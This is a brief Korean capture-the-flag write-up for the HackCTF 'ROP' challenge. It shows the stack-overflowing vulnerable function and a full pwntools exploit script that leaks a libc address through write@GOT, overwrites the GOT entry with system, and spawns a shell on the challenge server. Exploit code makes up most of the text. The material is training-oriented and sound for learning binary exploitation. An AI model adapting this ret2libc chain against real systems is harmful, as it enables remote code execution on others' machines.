Hackctf Rop Writeup

LeeDoHyun · January 26, 2020

#HackCTF ROP

친절하게 vulnerability_func에 취약점이 터지는것을 알려줍니다.

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  return read(0, &buf, 0x100u);
}

pppr, bss, write_plt, write_got, read_plt 구해서 익스 짜주면 됩니다.

exploit.py

from pwn import *

context.log_level = "debug"
IP = "ctf.j0n9hyun.xyz"
PORT = "3021"
r = remote(IP, PORT)
#r = process("./rop")
e = ELF("./rop")
libc = ELF("libc.so.6")

pppr = 0x8048509
bss = e.bss()
write_plt = e.plt["write"]
write_got = e.got["write"]
read_plt = e.plt["read"]
binsh = "/bin/sh\x00"

payload = "A"*140
payload += p32(write_plt) + p32(pppr) + p32(1) + p32(write_got) + p32(4)
payload += p32(read_plt) + p32(pppr) + p32(0) + p32(write_got) + p32(4)
payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bss) + p32(8)
payload += p32(write_plt) + "aaaa" + p32(bss)
r.send(payload)

write = u32(r.recv(4))
base = write - libc.symbols["write"]
system = base + libc.symbols["system"]

r.send(p32(system))
r.send(binsh)
r.interactive()

Twitter, Facebook